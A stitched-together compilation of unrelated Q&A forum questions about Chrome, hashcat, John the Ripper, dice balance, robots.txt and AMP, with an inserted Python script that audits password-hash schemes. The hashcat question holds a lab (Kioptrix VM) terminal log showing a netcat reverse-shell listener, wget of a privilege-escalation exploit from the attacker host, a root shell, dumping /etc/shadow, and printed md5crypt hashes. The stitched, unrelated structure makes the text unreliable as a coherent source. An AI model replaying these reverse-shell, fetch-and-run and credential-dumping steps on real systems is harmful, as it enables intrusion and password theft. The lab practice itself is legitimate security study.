“View frame source” is suddenly an option on every website loaded with Chrome

I’m running Google Chrome Version 83.0.4103.61 (64-bit) on Windows 10, and I’ve suddenly noticed that no matter what website I visit, when I right-click, “View frame source” is an option.

This strikes me as odd, as that option is usually only available when you’re wanting to view the source code of an iFrame. Whether I click “View frame source” or “View page source” the source code and URL are the same.

But why does Chrome suddenly think that any website I load is being displayed in a frame? Is this cause for concern or am I just being paranoid?

hashcat: No hashes loaded

I’ve been trying Kioptrix: Level 1.1 (#2) and managed to get root access. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

    wolf@linux:~$ nc -vklp 8080
    listening on [any] 8080 ...
    10.10.10.10: inverse host lookup failed: Unknown host
    connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795

    id
    uid=48(apache) gid=48(apache) groups=48(apache)

    cd /tmp
    wget http://10.10.10.99/privesc.c
    ls
    privesc.c
    gcc privesc.c -o privesc
    ./privesc

    id
    uid=0(root) gid=0(root) groups=48(apache)

    cat /etc/passwd
    cat /etc/shadow

unshadow file = md5.txt

    wolf@linux:~$ cat md5.txt
    root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash
    john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash
    harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash
    wolf@linux:~$

However, I’m having a problem sending the unshadow file md5.txt to hashcat.

Any idea what’s wrong with this?

    wolf@linux:~$ hashcat -m 0 -a 0 md5.txt rockyou.txt
    hashcat (v4.0.1) starting...

    * Device #1: WARNING! Kernel exec timeout is not disabled.
                 This may cause "CL_OUT_OF_RESOURCES" or related errors.
                 To disable the timeout, see: https://hashcat.net/q/timeoutpatch
    nvmlDeviceGetFanSpeed(): Not Supported

    OpenCL Platform #1: NVIDIA Corporation
    ======================================

    Hashfile 'md5.txt' on line 1 (root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception
    Hashfile 'md5.txt' on line 2 (john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception
    Hashfile 'md5.txt' on line 3 (harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception
    Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

    Started: Mon May 25 01:17:21 2020
    Stopped: Mon May 25 01:17:21 2020
    wolf@linux:~$
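
The lines in md5.txt are seven-field passwd-style records whose password field carries the crypt(3) identifier 1 (md5crypt, a salted scheme), not a bare 32-hex-character MD5 digest. The following is an added example, not part of the original post: a small auditing script that parses such records and reports which storage scheme each account uses. The sample records, the placeholder hashes and the function names are constructed for illustration.

```python
import re

# crypt(3) scheme identifiers as they appear between the first two '$'.
SCHEMES = {
    "1": ("md5crypt", "weak"),
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"), "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "y": ("yescrypt", "ok"),
}
RAW_MD5 = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample in unshadow (passwd-style) layout; hashes are placeholders.
SAMPLE = """\
alice:$1$AAAAAAAA$BBBBBBBBBBBBBBBBBBBBBB:500:500::/home/alice:/bin/bash
bob:$6$CCCCCCCC$DDDDDDDD:501:501::/home/bob:/bin/bash
carol:!!:502:502::/home/carol:/bin/bash
dave:0123456789abcdef0123456789abcdef:503:503::/home/dave:/bin/bash
"""

def classify(hash_field):
    """Return (scheme, rating) for one password field."""
    if hash_field == "":
        return ("empty-password", "weak")
    if hash_field in ("*", "x") or hash_field.startswith("!"):
        return ("locked-or-shadowed", "n/a")
    if RAW_MD5.match(hash_field):
        return ("raw-md5-hex", "weak")
    m = re.match(r"^\$([0-9a-z]+)\$", hash_field)
    if m:
        return SCHEMES.get(m.group(1), ("unknown-crypt-id", "review"))
    return ("unknown", "review")

def audit(text):
    """Parse passwd-style records; return a list of (user, scheme, rating)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        hash_field = fields[1] if len(fields) > 1 else ""
        # Only field 2 is the hash; the record as a whole (user, uid, gid,
        # home, shell) is far longer than any single digest format.
        rows.append((fields[0],) + classify(hash_field))
    return rows

if __name__ == "__main__":
    for row in audit(SAMPLE):
        print(row)
```

Accounts reported as md5crypt or raw-md5-hex are candidates for forced rehashing to a stronger scheme at next login.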

Chrome: why is invalid certificate usage for resources loaded from localhost disabled?

In Chrome there is a flag called allow-insecure-localhost. As far as I can tell, all it does is block localhost connections over TLS if the certificate is self-signed.

Why is this feature turned off by default? Does it affect regular users in any way (regular user = someone who is not developing something)? Are there any serious cases of localhost connections being used maliciously that could have been prevented by having this option enabled?

JohnTheRipper Error: No password hashes loaded (see FAQ)

I’m new to CTF challenges and came across a challenge where I’m required to crack the ZIP file using johntheripper with the rockyou.txt wordlist.

So for that, I tried both using sudo apt-get install john and also using the GitHub repo of it and compiling it. But in both cases, I’m getting the same error:

Using default input encoding: UTF-8

No password hashes loaded (see FAQ)

I’m using Ubuntu on my Windows 10 machine using Windows Subsystem for Linux.

So please help me out with the steps I need to follow to rectify the issue.

Is the Saltwater Float represented in this question a good way to test for loaded dice?

Recently a question has popped up in the comments of another question I’ve recently answered where a player has happened to roll three 18s and other high stats at a table with his dice, which could lead me to believe that he may be playing with a set of loaded or imbalanced dice.

Is the method presented in the YouTube video How to check the balance of your d20 an accurate representation of a die’s weighting and balance, and could it be used to properly and reliably test whether dice are loaded?

The video provides the following instructions for testing whether or not a die is balanced:

Ingredients:
1/4 cup of hot tap water (our water is a little hard)
6 tablespoons of Epsom salt

  1. Put the water in a small jam jar.
  2. Dump 2 tablespoons of Epsom salt into the water; put the lid on it and shake it till it dissolves.
  3. Dump 2 more tablespoons of Epsom salt into the water; put the lid on it and shake it till it dissolves.
  4. Add the last 2 tablespoons of Epsom salt; microwave the water on high for 30 seconds.
  5. Put the lid on it and shake it till it dissolves (use a dish towel to hold this, it is hot at this point).
  6. Once dissolved, set the closed container in a cold water bath until it cools back down to a little cooler than the room temperature.

Can robots.txt be used to prevent bots from seeing lazily loaded content?

Let’s say that googlebot is scraping https://example.com/page.

  • example.com has a robots.txt file that disallows /endpoint-for-lazy-loaded-content, but allows /page
  • /page lazy loads content using /endpoint-for-lazy-loaded-content (via fetch)

Does googlebot see the lazy loaded content?

Can I prevent my website from being loaded as AMP?

For some unknown reason, Facebook has decided that it wants to load my blog website as an AMP website, which only shows an excerpt and there’s no way for the user to see the entire article. The previous behaviour over the past five years has been that clicking the article thumbnail will just open the website normally. Just recently this changed to AMP version. I’ve made no changes to the website, so I don’t know why the sudden change is happening.

Regardless, now all of my past shares load as AMP instead of regular.

Is there a way to stop apps or websites from trying to load my content as AMP? My website’s not set up for AMP, nor do I want it to be.